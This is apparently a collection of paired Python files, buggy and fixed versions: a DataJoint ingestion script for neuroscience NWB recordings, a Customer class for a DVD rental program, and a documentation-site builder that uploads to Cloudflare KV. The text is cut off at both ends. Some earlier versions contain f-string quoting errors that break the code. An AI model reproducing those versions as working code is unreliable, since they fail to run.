ignore_extra_fields=True, allow_direct_insert=True) stimulation.TrialPhotoStimParam.insert1(dict(trial_key, photo_stim_mode='_'.join( trials['trial_type'][idx].split('_')[1:])), ignore_extra_fields=True, allow_direct_insert=True) # ==================== Photo stimulation ==================== if 'optogenetics' in nwb['general']: for site in nwb['general']['optogenetics']: opto_descs = nwb['general']['optogenetics'][site]['description'].value.decode('UTF-8') opto_excitation_lambda = (re.search("\d+", nwb['general']['optogenetics'][site]['excitation_lambda'] .value.decode('UTF-8')).group()) splittedstr = re.split(',\s?coordinates:\s?', nwb['general']['optogenetics'][site]['location'].value.decode('UTF-8')) brain_region = splittedstr[0] coord_ap_ml_dv = re.findall('\d+\.\d+', splittedstr[-1]) # -- BrainLocation brain_location = {'brain_region': brain_region, 'brain_subregion': 'N/A', 'cortical_layer': 'N/A', 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates=True) # -- ActionLocation action_location = dict(brain_location, coordinate_ref = 'bregma', coordinate_ap = round(Decimal(coord_ap_ml_dv[0]), 2), coordinate_ml = round(Decimal(coord_ap_ml_dv[1]), 2), coordinate_dv = round(Decimal(coord_ap_ml_dv[2]), 2)) reference.ActionLocation.insert1(action_location, skip_duplicates=True) # -- Device stim_device = nwb['general']['optogenetics'][site]['device'].value.decode('UTF-8') stimulation.PhotoStimDevice.insert1({'device_name': stim_device}, skip_duplicates=True) # -- PhotoStimulationProtocol photim_stim_protocol = dict(protocol=re.search('\d+', site).group(), device_name=stim_device, photo_stim_method='laser', photo_stim_excitation_lambda=float(opto_excitation_lambda), photo_stim_notes=(f'{site} - {opto_descs}')) stimulation.PhotoStimProtocol.insert1(photim_stim_protocol, skip_duplicates=True) # -- PhotoStimulation stim_presentation = None for f in nwb['stimulus']['presentation']: if ('site' in nwb['stimulus']['presentation'][f] and nwb['stimulus']['presentation'][f]['site'].value.decode('UTF-8') == site): stim_presentation = nwb['stimulus']['presentation'][f] break if stim_presentation and dict({**subject_info, **session_info}, photostim_id=site) not in stimulation.PhotoStimulation.proj(): photostim_data = stim_presentation['data'].value photostim_timestamps = stim_presentation['timestamps'].value stimulation.PhotoStimulation.insert1(dict({**session_info, **photim_stim_protocol, **action_location}, photostim_id=site, photostim_timeseries=photostim_data, photostim_timestamps=photostim_timestamps), ignore_extra_fields = True) print(f'Ingest photostim: {site}') # ==================== Virus ==================== virus_desc_pattern = re.compile(r'virusSource: (?P<virus_source>.*); virusID: (?P<virus_id>.*); virusLotNumber: (?P<virus_lot_num>.*); inflectionCoordinates: (?P<injection_coord>.*); infectionLocation: (?P<injection_loc>.*); virusTiter: (?P<virus_titer>.*); injectionVolume: (?P<injection_volume>.*); injectionDate: (?P<injection_date>.*);(.+)') match = virus_desc_pattern.match(nwb['general']['virus'].value.decode('UTF-8')) if match and match['virus_id']: virus_info = dict( virus_source=match['virus_source'], virus=match['virus_id'], virus_lot_number=match['virus_lot_num'], virus_titer=float(match['virus_titer'])) virus.Virus.insert1(virus_info, skip_duplicates=True) brain_location = {'brain_region': match['injection_loc'], 'brain_subregion': match['injection_coord'].split(' ')[0], 'cortical_layer': 'N/A', 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates=True) virus.VirusInjection.insert1(dict({**virus_info, **subject_info, **brain_location}, coordinate_ref='bregma', injection_date=utilities.parse_date( re.search('(\d{4})-(\d{2})-(\d{2})', match['injection_date']).group()), injection_volume=round(Decimal(re.match('\d+', match['injection_volume']).group()), 2)), ignore_extra_fields=True, skip_duplicates=True) print('Ingest virus injection')
import os import re import pathlib import h5py as h5 import numpy as np from decimal import Decimal from tqdm import tqdm import glob import datajoint as dj from pipeline import (reference, subject, acquisition, intracellular, behavior, stimulation, virus, utilities) path = pathlib.Path(dj.config['custom'].get('data_directory')).as_posix() fnames = np.hstack(glob.glob(os.path.join(dir_files[0], '*.nwb')) if len(dir_files[1]) == 0 and dir_files[0].find('VPM_silicon_probe') == -1 else [] for dir_files in os.walk(path)) for fname in fnames: print(f'Reading {fname}...') nwb = h5.File(fname, 'r') subject_info = {c: nwb['general']['subject'][c].value.decode('UTF-8') for c in ('subject_id', 'description', 'sex', 'species', 'weight', 'age', 'genotype')} # force subject_id to be lower-case for consistency subject_info['subject_id'] = subject_info['subject_id'].lower() # dob and sex subject_info['sex'] = subject_info['sex'][0].upper() dob_str = re.search('(?<=Date of birth:\s)(.*)', subject_info['description']) if utilities.parse_date(dob_str.group()) is not None: subject_info['date_of_birth'] = utilities.parse_date(dob_str.group()) # allele allele_str = re.search('(?<=Animal Strain:\s)(.*)', subject_info['description']).group() # extract the information related to animal allele allele_dict = {alias.lower(): allele for alias, allele in subject.AlleleAlias.fetch()} regex_str = '|'.join([re.escape(alias) for alias in allele_dict.keys()]) alleles = [allele_dict[s.lower()] for s in re.findall(regex_str, allele_str, re.I)] # source source_str = re.search('(?<=Animal source:\s)(.*)', subject_info['description']).group() # extract the information related to animal allele source_dict = {alias.lower(): source for alias, source in reference.AnimalSourceAlias.fetch()} regex_str = '|'.join([re.escape(alias) for alias in source_dict.keys()]) subject_info['animal_source'] = source_dict[re.search(regex_str, source_str, re.I).group().lower()] if re.search(regex_str, source_str, re.I) else 'N/A' with subject.Subject.connection.transaction: if subject_info not in subject.Subject.proj(): subject.Subject.insert1(subject_info, ignore_extra_fields = True) subject.Subject.Allele.insert((dict(subject_info, allele = k) for k in alleles), ignore_extra_fields = True) # ==================== session ==================== # -- session_time session_info = dict(subject_info, session_id=os.path.split(fname)[-1].replace('.nwb', ''), experiment_description=nwb['general']['experiment_description'].value.decode('UTF-8'), institution=nwb['general']['institution'].value.decode('UTF-8'), related_publications=nwb['general']['related_publications'].value.decode('UTF-8'), surgery=nwb['general']['surgery'].value.decode('UTF-8'), lab=nwb['general']['lab'].value.decode('UTF-8'), notes=nwb['general']['notes'].value.decode('UTF-8'), identifier=nwb['identifier'].value.decode('UTF-8'), session_note=nwb['session_description'].value.decode('UTF-8'), session_time=utilities.parse_date(nwb['general']['session_id'].value.decode('UTF-8'))) experimenters = nwb['general']['experimenter'].value.decode('UTF-8') experiment_types = re.split('Experiment type: ', session_info['notes'])[-1] experiment_types = re.split(',\s?', experiment_types) session_info['session_note'] = session_info.pop('session_note') + '; ' + session_info.pop('experiment_description') # experimenter and experiment type (possible multiple experimenters or types) experimenters = [experimenters] if np.array( experimenters).size <= 1 else experimenters # in case there's only 1 experimenter reference.Experimenter.insert(zip(experimenters), skip_duplicates = True) acquisition.ExperimentType.insert(zip(experiment_types), skip_duplicates=True) sess_key = {'subject_id': subject_info["subject_id"], 'session_time': session_info["session_time"], 'session_id': session_info['session_id']} with acquisition.Session.connection.transaction: if session_info not in acquisition.Session.proj(): acquisition.Session.insert1(session_info, ignore_extra_fields=True) acquisition.Session.Experimenter.insert((dict(session_info, experimenter=k) for k in experimenters), ignore_extra_fields=True) acquisition.Session.ExperimentType.insert((dict(session_info, experiment_type=k) for k in experiment_types), ignore_extra_fields=True) print(f'\nCreating Session - Subject: {subject_info["subject_id"]} - Date: {session_info["session_time"]}') # ==================== Intracellular ==================== # -- read data - intracellular_ephys ephys_name = list(nwb['general']['intracellular_ephys'])[0] ie_info = {c: nwb['general']['intracellular_ephys'][ephys_name][c].value.decode('UTF-8') for c in nwb['general']['intracellular_ephys'][ephys_name]} coord_ap_ml_dv = re.findall('\d+.\d+', ie_info['location']) hemisphere = 'left' # hardcoded here brain_location = {'brain_region': 'barrel cortex', # hardcoded here 'brain_subregion': 'N/A', 'cortical_layer': re.search('(?<=L)(\d)', session_info['session_note']).group(), 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates = True) # -- ActionLocation action_location = dict(brain_location, coordinate_ref='bregma', # hardcoded here coordinate_ap=round(Decimal(coord_ap_ml_dv[0]), 2), coordinate_ml=round(Decimal(coord_ap_ml_dv[1]), 2), coordinate_dv=round(Decimal(coord_ap_ml_dv[2]) * Decimal('1e-3'), 2)) reference.ActionLocation.insert1(action_location, skip_duplicates = True) # -- Whole Cell Device reference.WholeCellDevice.insert1({'device_name': ie_info['device']}, skip_duplicates=True) # -- Cell - there should only be 1 unit for whole-cell recording unit = nwb['processing']['spike_times']['UnitTimes']['unit_list'].value[0].decode('UTF-8') unit_desc = nwb['processing']['spike_times']['UnitTimes'][unit]['unit_description'].value.decode('UTF-8') cell_key = dict({**sess_key, **action_location}, cell_type = re.search('|'.join(intracellular.CellType.fetch('cell_type')), unit_desc, re.I).group(), device_name = ie_info['device']) # determine if it is 'membrane_potential' or 'juxta_potential' for f in nwb['acquisition']['timeseries']: if re.search('potential', f): Vm_field = f break with intracellular.Cell.connection.transaction: if cell_key not in intracellular.Cell.proj(): intracellular.Cell.insert1(cell_key, ignore_extra_fields=True) intracellular.MembranePotential.insert1(dict( cell_key, membrane_potential=nwb['acquisition']['timeseries'][Vm_field]['data'].value, membrane_potential_timestamps=nwb['acquisition']['timeseries'][Vm_field]['timestamps'].value), ignore_extra_fields=True, allow_direct_insert=True, skip_duplicates=True) intracellular.CurrentInjection.insert1(dict( cell_key, current_injection=nwb['acquisition']['timeseries']['current']['data'].value, current_injection_timestamps=nwb['acquisition']['timeseries']['current']['timestamps'].value), ignore_extra_fields = True, allow_direct_insert = True, skip_duplicates=True) intracellular.UnitSpikeTimes.insert1(dict( cell_key, unit_id=int(re.search('\d+', unit).group()), spike_times=nwb['processing']['spike_times']['UnitTimes'][unit]['times'].value), ignore_extra_fields = True, allow_direct_insert = True, skip_duplicates=True) print('Ingest intracellular data') else: print(f'Cell exists: {fname}') # ==================== Behavior ==================== behavior.LickTrace.insert1(dict( sess_key, lick_trace=nwb['acquisition']['timeseries']['lick_trace']['data'].value, lick_trace_timestamps=nwb['acquisition']['timeseries']['lick_trace']['timestamps'].value), skip_duplicates=True, allow_direct_insert=True) principal_whisker, principal_whisker_num = nwb['analysis']['principal_whisker'].value[0].decode('UTF-8'), '1' whisker_timeseries = nwb['processing']['whisker']['BehavioralTimeSeries'] whisker_configs = ([wk.decode('UTF-8') for wk in nwb["general"]["whisker_configuration"].value] if nwb["general"]["whisker_configuration"].value.shape else [wk for wk in nwb["general"]["whisker_configuration"].value.decode('UTF-8').split(',')]) print(f'Whiskers: {whisker_configs} - Principal: {principal_whisker}') for whisker_config, whisker_num in zip(whisker_configs, set([re.search('\d', k).group() for k in whisker_timeseries])): whisker_key = dict(sess_key, whisker_config=whisker_config) principal_whisker_num = whisker_num if whisker_config == principal_whisker else principal_whisker_num if whisker_key not in behavior.Whisker.proj(): # ---- Extract behavior time-series and recondition b_tvec = whisker_timeseries['touch_onset_' + whisker_num]['timestamps'].value * 1e-3 # convert msec->second diff_btvec = np.diff(b_tvec) tr_break_idx = np.where(diff_btvec > 1)[0] tr_break_idx = tr_break_idx + 1 tr_break_idx = np.concatenate([[0], tr_break_idx, [len(b_tvec)]]) behavior_timestamps = np.hstack([(b_tvec[start:end] - b_tvec[start]) * 1e3 + b_tvec[start] for start, end in zip(tr_break_idx[:-1], tr_break_idx[1:])]) behavior.Whisker.insert1(dict( whisker_key, principal_whisker=(whisker_config == principal_whisker), distance_to_pole=whisker_timeseries['distance_to_pole_' + whisker_num]['data'].value.flatten(), touch_offset=whisker_timeseries['touch_offset_' + whisker_num]['data'].value.flatten(), touch_onset=whisker_timeseries['touch_onset_' + whisker_num]['data'].value.flatten(), whisker_angle=whisker_timeseries['whisker_angle_' + whisker_num]['data'].value.flatten(), whisker_curvature=whisker_timeseries['whisker_curvature_' + whisker_num]['data'].value.flatten(), behavior_timestamps= behavior_timestamps), skip_duplicates=True, allow_direct_insert=True) print(f'Ingest whisker data: {whisker_config} - Principal: {whisker_config == principal_whisker}') # ==================== Trials ==================== trial_resp_options = [k.decode('UTF-8') for k in nwb['analysis']['trial_type_string'].value.flatten()][:-1] # -- read trial-related info -- nwb['epochs'], nwb['analysis'], nwb['stimulus']['presentation']) trials = dict(trial_names=[tr for tr in nwb['epochs']], trial_type=[v['description'].value.decode('UTF-8') for v in nwb['epochs'].values()], start_times=[v['start_time'].value for v in nwb['epochs'].values()], stop_times=[v['stop_time'].value for v in nwb['epochs'].values()], good_trials=nwb['analysis']['good_trials'].value, trial_response=nwb['analysis']['trial_type_mat'].value, pole_pos_time=nwb['stimulus']['presentation']['pole_pos']['timestamps'].value, pole_pos=nwb['stimulus']['presentation']['pole_pos']['data'].value, pole_in_times=nwb['stimulus']['presentation']['pole_in']['timestamps'].value, pole_out_times=nwb['stimulus']['presentation']['pole_out']['timestamps'].value) lick_times = (nwb['acquisition']['timeseries']['lick_trace']['data'].value * (nwb['acquisition']['timeseries']['lick_trace']['timestamps'].value)) lick_times = lick_times[lick_times != 0] touch_times = (nwb['processing']['whisker']['BehavioralTimeSeries']['touch_onset_' + principal_whisker_num]['data'].value.flatten() * nwb['processing']['whisker']['BehavioralTimeSeries']['touch_onset_' + principal_whisker_num]['timestamps'].value.flatten()) touch_times = touch_times[touch_times != 0] * 1e-3 # convert ms -> s (behav data timestamps are in millisecond) # form new key-values pair and insert key trial_set = dict(sess_key, trial_counts=len(trials['trial_names'])) if trial_set not in acquisition.TrialSet.proj(): print(f'Ingest trial information\n') acquisition.TrialSet.insert1(trial_set, allow_direct_insert=True) for idx, trial_id in tqdm(enumerate(trials['trial_names'])): trial_key = dict(trial_set, trial_id=int(re.search('\d+', trial_id).group())) trial_detail = dict(start_time=trials['start_times'][idx], stop_time=trials['stop_times'][idx], trial_is_good=True if trials['good_trials'].flatten()[idx] == 1 else False, trial_type=re.match('Go|Nogo', trials['trial_type'][idx]).group(), trial_stim_present=True if trials['trial_response'][idx, -1] == 1 else False, trial_response=trial_resp_options[np.where(trials['trial_response'][idx, :-1])[0][0]], pole_position=trials['pole_pos'][idx]) # insert acquisition.TrialSet.Trial.insert1({**trial_key, **trial_detail}, ignore_extra_fields=True, skip_duplicates=True, allow_direct_insert=True) # ======== Now add trial event timing to the EventTime part table ==== # -- events timing trial_lick_times = lick_times[np.logical_and(lick_times > trial_detail['start_time'], lick_times < trial_detail['stop_time'])] trial_touch_times = touch_times[np.logical_and(touch_times > trial_detail['start_time'], touch_times < trial_detail['stop_time'])] events = dict(trial_start=0, trial_stop=trial_detail['stop_time'] - trial_detail['start_time'], pole_in=trials['pole_in_times'][idx] - trial_detail['start_time'], pole_out=trials['pole_out_times'][idx] - trial_detail['start_time'], pole_pos=trials['pole_pos_time'][idx] - trial_detail['start_time'], first_lick=trial_lick_times[0] - trial_detail['start_time'] if trial_lick_times.size else np.nan, first_touch=trial_touch_times[0] - trial_detail['start_time'] if trial_touch_times.size else np.nan) acquisition.TrialSet.EventTime.insert((dict(trial_key, trial_event=k, event_time=v) for k, v in events.items()), ignore_extra_fields=True, allow_direct_insert=True) stimulation.TrialPhotoStimParam.insert1(dict(trial_key, photo_stim_mode='_'.join( trials['trial_type'][idx].split('_')[1:])), ignore_extra_fields=True, allow_direct_insert=True) # ==================== Photo stimulation ==================== if 'optogenetics' in nwb['general']: for site in nwb['general']['optogenetics']: opto_descs = nwb['general']['optogenetics'][site]['description'].value.decode('UTF-8') opto_excitation_lambda = (re.search("\d+", nwb['general']['optogenetics'][site]['excitation_lambda'] .value.decode('UTF-8')).group()) splittedstr = re.split(',\s?coordinates:\s?', nwb['general']['optogenetics'][site]['location'].value.decode('UTF-8')) brain_region = splittedstr[0] coord_ap_ml_dv = re.findall('\d+\.\d+', splittedstr[-1]) # -- BrainLocation brain_location = {'brain_region': brain_region, 'brain_subregion': 'N/A', 'cortical_layer': 'N/A', 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates=True) # -- ActionLocation action_location = dict(brain_location, coordinate_ref = 'bregma', coordinate_ap = round(Decimal(coord_ap_ml_dv[0]), 2), coordinate_ml = round(Decimal(coord_ap_ml_dv[1]), 2), coordinate_dv = round(Decimal(coord_ap_ml_dv[2]), 2)) reference.ActionLocation.insert1(action_location, skip_duplicates=True) # -- Device stim_device = nwb['general']['optogenetics'][site]['device'].value.decode('UTF-8') stimulation.PhotoStimDevice.insert1({'device_name': stim_device}, skip_duplicates=True) # -- PhotoStimulationProtocol photim_stim_protocol = dict(protocol=re.search('\d+', site).group(), device_name=stim_device, photo_stim_method='laser', photo_stim_excitation_lambda=float(opto_excitation_lambda), photo_stim_notes=(f'{site} - {opto_descs}')) stimulation.PhotoStimProtocol.insert1(photim_stim_protocol, skip_duplicates=True) # -- PhotoStimulation stim_presentation = None for f in nwb['stimulus']['presentation']: if ('site' in nwb['stimulus']['presentation'][f] and nwb['stimulus']['presentation'][f]['site'].value.decode('UTF-8') == site): stim_presentation = nwb['stimulus']['presentation'][f] break if stim_presentation and dict({**subject_info, **session_info}, photostim_id=site) not in stimulation.PhotoStimulation.proj(): photostim_data = stim_presentation['data'].value photostim_timestamps = stim_presentation['timestamps'].value stimulation.PhotoStimulation.insert1(dict({**session_info, **photim_stim_protocol, **action_location}, photostim_id=site, photostim_timeseries=photostim_data, photostim_timestamps=photostim_timestamps), ignore_extra_fields = True) print(f'Ingest photostim: {site}') # ==================== Virus ==================== virus_desc_pattern = re.compile(r'virusSource: (?P<virus_source>.*); virusID: (?P<virus_id>.*); virusLotNumber: (?P<virus_lot_num>.*); inflectionCoordinates: (?P<injection_coord>.*); infectionLocation: (?P<injection_loc>.*); virusTiter: (?P<virus_titer>.*); injectionVolume: (?P<injection_volume>.*); injectionDate: (?P<injection_date>.*);(.+)') match = virus_desc_pattern.match(nwb['general']['virus'].value.decode('UTF-8')) if match and match['virus_id']: virus_info = dict( virus_source=match['virus_source'], virus=match['virus_id'], virus_lot_number=match['virus_lot_num'], virus_titer=float(match['virus_titer'])) virus.Virus.insert1(virus_info, skip_duplicates=True) brain_location = {'brain_region': match['injection_loc'], 'brain_subregion': match['injection_coord'].split(' ')[0], 'cortical_layer': 'N/A', 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates=True) virus.VirusInjection.insert1(dict({**virus_info, **subject_info, **brain_location}, coordinate_ref='bregma', injection_date=utilities.parse_date( re.search('(\d{4})-(\d{2})-(\d{2})', match['injection_date']).group()), injection_volume=round(Decimal(re.match('\d+', match['injection_volume']).group()), 2)), ignore_extra_fields=True, skip_duplicates=True) print('Ingest virus injection')
class Customer: def __init__(self, name, age, id): self.name = name self.age = age self.id = id self.rented_dvds = [] def __repr__(self): result = f"{self.id}: {self.name} of age {self.age}" \ f" has {len(self.rented_dvds)} rented DVD"s ({", ".join([x.name for x in self.rented_dvds])})" return result
class Customer: def __init__(self, name, age, id): self.name = name self.age = age self.id = id self.rented_dvds = [] def __repr__(self): result = f"{self.id}: {self.name} of age {self.age}" \ f" has {len(self.rented_dvds)} rented DVD's ({', '.join([x.name for x in self.rented_dvds])})" return result
import docs import hashlib import json import os import sys import util FLAG_NAME_MAP={"check_output":"Check Output","optimizable":"Optimizable"} IGNORE_FLAG_NAME=["func","var","var_arg"] def _add_data(nm,dt): nm=nm.replace("\\","/")[:255].encode("ascii","ignore") dt=dt[:16777215] if (nm[-5:]==b".html"): dt=dt.replace(b"{{ROOT}}",(b"" if os.getenv("GITHUB_ACTIONS",None) is not None else bytes(os.path.abspath(os.getcwd()+"/build/web"),"utf-8"))) return bytearray([len(nm),len(dt)&0xff,(len(dt)>>8)&0xff,len(dt)>>16])+nm+dt def _generate_data(dt,pg_src): m={} for k in dt["groups"]: m[k]={"":[]} for k in dt["data"]: if (k["subgroup"] is None): m[k["group"]][""].append(k) elif (k["subgroup"] not in m[k["group"]]): m[k["group"]][k["subgroup"]]=[k] else: m[k["group"]][k["subgroup"]].append(k) toc="" pg_dt=b"" for k,v in sorted(m.items(),key=lambda e:dt["groups"][e[0]]["name"]): toc+=f"<div class=\"group\" id=\"{k}\"><a href=\"{{{{ROOT}}}}/{k}.html\"><h2 class=\"title\">{dt["groups"][k]["name"]}</h2></a><div class=\"group-box\">" pg=f"<h1>{dt["groups"][k]["name"]}</h1><h3>{dt["groups"][k]["desc"]}</h3>" for sk,sv in sorted(v.items(),key=lambda e:("" if e[0]=="" else dt["subgroups"][e[0]]["name"])): if (len(sv)==0): continue toc+="<div class=\"subgroup\">" if (len(sk)!=0): toc+=f"<a href=\"{{{{ROOT}}}}/{k}.html#{sk}\"><h3 class=\"sg-title\">{dt["subgroups"][sk]["name"]}</h3></a>" pg+=f"<a id=\"{sk}\" href=\"#{sk}\" style=\"text-decoration: none;color: #3010ff\"><h2>{dt["subgroups"][sk]["name"]}</h2></a><h4>{dt["subgroups"][sk]["desc"]}</h4>" toc+="<ul>" for e in sorted(sv,key=lambda se:se["name"]): toc+=f"<li><a href=\"{{{{ROOT}}}}/{e["group"]}.html#{e["name"]}\">{e["name"]+("()" if "func" in e["flag"] else "")}</a></li>" pg+=f"<div><a id=\"{e["name"]}\" href=\"#{e["name"]}\" style=\"text-decoration: none;color: #ff0000\"><pre>" if ("func" in e["flag"]): if ("check_output" in e["flag"]): pg+="<span style=\"color: #cf89a2\">(check_output)</span> " if (e["ret"] is not None): pg+=e["ret"]["type"] else: pg+="void" pg+=" "+e["name"]+"(" if (len(e["args"])==0): pg+="void" else: st=True for a in e["args"]: if (st): st=False else: pg+="," pg+=a["type"]+" "+a["name"] if ("var_arg" in e["flag"]): pg+=",..." pg+=")" else: pg+=e["name"] pg+=f"</pre></a><pre>Description: {e["desc"]}" if (len(e["args"])!=0): pg+="\nArguments:" for a in e["args"]: pg+=f"\n {a["name"]} -> {a["desc"]}" if (e["ret"] is not None): pg+=f"\nReturn Value: {e["ret"]["desc"]}" pg+="</pre></div>" toc+="</ul></div>" toc+="</div></div>" util.log(f" Generating '/{k}.html'...") pg_dt+=_add_data(f"/{k}.html",pg_src.replace(b"{{DATA}}",bytes(pg,"utf-8")).replace(b"{{NAME}}",bytes(dt["groups"][k]["name"],"utf-8"))) return bytes(toc,"utf-8"),pg_dt def generate(): cf_a_dt=b"-->"+bytes(os.getenv("ANALYTICS",""),"utf-8")+b"<!--" o=bytearray() util.log("Reading CSS Files...") for k in os.listdir("src/web/client/css"): util.log(f" Found file 'src/web/client/css/{k}'") with open("src/web/client/css/"+k,"rb") as rf: o+=_add_data("/css/"+k,rf.read()) util.log("Reading JS Files...") for k in os.listdir("src/web/client/js"): util.log(f" Found file 'src/web/client/js/{k}'") with open("src/web/client/js/"+k,"rb") as rf: o+=_add_data("/js/"+k,rf.read()) util.log("Collecting Documentation Files...") d_fl=util.get_docs_files() util.log(f" Found {len(d_fl)} Files\nGenerating Documentation...") d_dt=docs.create_docs(d_fl)[0] util.log("Reading 'src/web/client/page.html'...") with open("src/web/client/page.html","rb") as rf: pg_src=rf.read() util.log(f"Generating Table of Content & Pages for {len(d_dt["data"])} Symbols...") toc,pg_dt=_generate_data(d_dt,pg_src.replace(b"{{ANALYTICS}}",cf_a_dt)) o+=pg_dt util.log("Reading 'src/web/client/index.html'...") with open("src/web/client/index.html","rb") as rf: o+=_add_data("/index.html",rf.read().replace(b"{{DATA}}",toc).replace(b"{{ANALYTICS}}",cf_a_dt)) util.log("Reading 'src/web/client/not_found.html'...") with open("src/web/client/not_found.html","rb") as rf: o+=_add_data("not_found.html",rf.read().replace(b"{{ANALYTICS}}",cf_a_dt)) util.log("Reading 'src/web/client/shell_install.sh'...") with open("src/web/client/shell_install.sh","rb") as rf: o+=_add_data("shell_install.sh",rf.read()) if (os.getenv("GITHUB_ACTIONS",None) is not None): with open("web-bundle.dt","wb") as f: f.write(o) else: util.log("Generating Local Website...") i=0 while (i<len(o)): l=o[i] sz=o[i+1]|(o[i+2]<<8)|(o[i+3]<<16) i+=4 fp="build/web/"+o[i:i+l].decode("ascii","ignore") os.makedirs(fp[:fp.rindex("/")],exist_ok=True) i+=l util.log(f" Writing '{fp}' ({sz} bytes)...") with open(fp,"wb") as f: f.write(o[i:i+sz]) i+=sz if (__name__=="__main__"): import requests if ("--server" in sys.argv): with open("src/web/server/main.js","rb") as f: util.log("Uploading Server Code...") requests.put(f"https://api.cloudflare.com/client/v4/accounts/{sys.argv[-3]}/workers/scripts/{sys.argv[-2]}",data=f.read(),headers={"Authorization":"Bearer "+sys.argv[-1],"Content-Type":"application/javascript"}) else: url=f"https://api.cloudflare.com/client/v4/accounts/{sys.argv[-3]}/storage/kv/namespaces/{sys.argv[-2]}/" h={"Authorization":"Bearer "+sys.argv[-1],"Content-Type":"application/json"} util.log("Listing Current KV Keys...") tb_r=requests.get(url+"values/__table",headers=h,stream=True).raw tb_r.decode_content=True l=[] n_tb=[] for k in tb_r.read().split(b"\x00"): if (k[:5]==b"/apt/" or k[:5]==b"/bin/"): n_tb.append(k) else: util.log(f" Found Key '{k.decode("ascii","ignore")}' ") l.append(hashlib.sha256(k).hexdigest()) util.log("Clearing KV Storage...") requests.delete(url+"bulk",headers=h,data="["+",".join([f"\"{e}\"" for e in l])+"]") util.log("Generating Request...") with open("web-bundle.dt","rb") as f: dt=f.read() i=0 o=[] while (i<len(dt)): l=dt[i] sz=dt[i+1]|(dt[i+2]<<8)|(dt[i+3]<<16) i+=4 fp=dt[i:i+l] i+=l fp_h=hashlib.sha256(fp).hexdigest() util.log(f" Encoding File '{fp.decode("ascii","ignore")}' ({sz} bytes) -> '{fp_h}'...") n_tb.append(fp) o.append({"key":fp_h,"value":util.encode(dt[i:i+sz]),"base64":True}) i+=sz o.append({"key":"__table","value":util.encode(b"\x00".join(n_tb)),"base64":True}) util.log("Uploading Data...") requests.put(url+"bulk",headers=h,data=json.dumps(o))
import docs import hashlib import json import os import sys import util FLAG_NAME_MAP={"check_output":"Check Output","optimizable":"Optimizable"} IGNORE_FLAG_NAME=["func","var","var_arg"] def _add_data(nm,dt): nm=nm.replace("\\","/")[:255].encode("ascii","ignore") dt=dt[:16777215] if (nm[-5:]==b".html"): dt=dt.replace(b"{{ROOT}}",(b"" if os.getenv("GITHUB_ACTIONS",None) is not None else bytes(os.path.abspath(os.getcwd()+"/build/web"),"utf-8"))) return bytearray([len(nm),len(dt)&0xff,(len(dt)>>8)&0xff,len(dt)>>16])+nm+dt def _generate_data(dt,pg_src): m={} for k in dt["groups"]: m[k]={"":[]} for k in dt["data"]: if (k["subgroup"] is None): m[k["group"]][""].append(k) elif (k["subgroup"] not in m[k["group"]]): m[k["group"]][k["subgroup"]]=[k] else: m[k["group"]][k["subgroup"]].append(k) toc="" pg_dt=b"" for k,v in sorted(m.items(),key=lambda e:dt["groups"][e[0]]["name"]): toc+=f"<div class=\"group\" id=\"{k}\"><a href=\"{{{{ROOT}}}}/{k}.html\"><h2 class=\"title\">{dt['groups'][k]['name']}</h2></a><div class=\"group-box\">" pg=f"<h1>{dt['groups'][k]['name']}</h1><h3>{dt['groups'][k]['desc']}</h3>" for sk,sv in sorted(v.items(),key=lambda e:("" if e[0]=="" else dt["subgroups"][e[0]]["name"])): if (len(sv)==0): continue toc+="<div class=\"subgroup\">" if (len(sk)!=0): toc+=f"<a href=\"{{{{ROOT}}}}/{k}.html#{sk}\"><h3 class=\"sg-title\">{dt['subgroups'][sk]['name']}</h3></a>" pg+=f"<a id=\"{sk}\" href=\"#{sk}\" style=\"text-decoration: none;color: #3010ff\"><h2>{dt['subgroups'][sk]['name']}</h2></a><h4>{dt['subgroups'][sk]['desc']}</h4>" toc+="<ul>" for e in sorted(sv,key=lambda se:se["name"]): toc+=f"<li><a href=\"{{{{ROOT}}}}/{e['group']}.html#{e['name']}\">{e['name']+('()' if 'func' in e['flag'] else '')}</a></li>" pg+=f"<div><a id=\"{e['name']}\" href=\"#{e['name']}\" style=\"text-decoration: none;color: #ff0000\"><pre>" if ("func" in e["flag"]): if ("check_output" in e["flag"]): pg+="<span style=\"color: #cf89a2\">(check_output)</span> " if (e["ret"] is not None): pg+=e["ret"]["type"] else: pg+="void" pg+=" "+e["name"]+"(" if (len(e["args"])==0): pg+="void" else: st=True for a in e["args"]: if (st): st=False else: pg+="," pg+=a["type"]+" "+a["name"] if ("var_arg" in e["flag"]): pg+=",..." pg+=")" else: pg+=e["name"] pg+=f"</pre></a><pre>Description: {e['desc']}" if (len(e["args"])!=0): pg+="\nArguments:" for a in e["args"]: pg+=f"\n {a['name']} -> {a['desc']}" if (e["ret"] is not None): pg+=f"\nReturn Value: {e['ret']['desc']}" pg+="</pre></div>" toc+="</ul></div>" toc+="</div></div>" util.log(f" Generating '/{k}.html'...") pg_dt+=_add_data(f"/{k}.html",pg_src.replace(b"{{DATA}}",bytes(pg,"utf-8")).replace(b"{{NAME}}",bytes(dt["groups"][k]["name"],"utf-8"))) return bytes(toc,"utf-8"),pg_dt def generate(): cf_a_dt=b"-->"+bytes(os.getenv("ANALYTICS",""),"utf-8")+b"<!--" o=bytearray() util.log("Reading CSS Files...") for k in os.listdir("src/web/client/css"): util.log(f" Found file 'src/web/client/css/{k}'") with open("src/web/client/css/"+k,"rb") as rf: o+=_add_data("/css/"+k,rf.read()) util.log("Reading JS Files...") for k in os.listdir("src/web/client/js"): util.log(f" Found file 'src/web/client/js/{k}'") with open("src/web/client/js/"+k,"rb") as rf: o+=_add_data("/js/"+k,rf.read()) util.log("Collecting Documentation Files...") d_fl=util.get_docs_files() util.log(f" Found {len(d_fl)} Files\nGenerating Documentation...") d_dt=docs.create_docs(d_fl)[0] util.log("Reading 'src/web/client/page.html'...") with open("src/web/client/page.html","rb") as rf: pg_src=rf.read() util.log(f"Generating Table of Content & Pages for {len(d_dt['data'])} Symbols...") toc,pg_dt=_generate_data(d_dt,pg_src.replace(b"{{ANALYTICS}}",cf_a_dt)) o+=pg_dt util.log("Reading 'src/web/client/index.html'...") with open("src/web/client/index.html","rb") as rf: o+=_add_data("/index.html",rf.read().replace(b"{{DATA}}",toc).replace(b"{{ANALYTICS}}",cf_a_dt)) util.log("Reading 